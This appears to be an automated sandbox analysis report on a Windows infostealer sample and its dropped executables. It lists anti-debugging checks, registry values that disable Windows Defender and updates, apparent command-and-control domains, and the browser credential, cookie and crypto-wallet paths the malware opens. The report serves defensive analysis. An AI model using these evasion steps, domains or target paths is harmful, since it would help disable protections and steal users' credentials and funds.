Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E142 Start: 00C8E199 End: 00C8E193 10_2_00C8E142
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: SIWVID
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E142 rdtsc 10_2_00C8E142
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00CA3D4C LdrInitializeThunk, 10_2_00CA3D4C
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: BGXAMSUR4L24WR8IH77.exe PID: 484, type: MEMORYSTR
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sweepyribs.lat
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1682988540.0000000000A9D000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1717486400.0000000000CD9000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: WProgram Manager
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: s31ydU1MpQ.exe, 00000000.00000003.1437700853.0000000001317000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: s31ydU1MpQ.exe PID: 6440, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000B.00000003.1623078762.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1681988687.0000000000681000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BGXAMSUR4L24WR8IH77.exe PID: 484, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: s31ydU1MpQ.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: s31ydU1MpQ.exe String found in binary or memory: Wallets/Exodus
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: s31ydU1MpQ.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: s31ydU1MpQ.exe String found in binary or memory: keystore
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
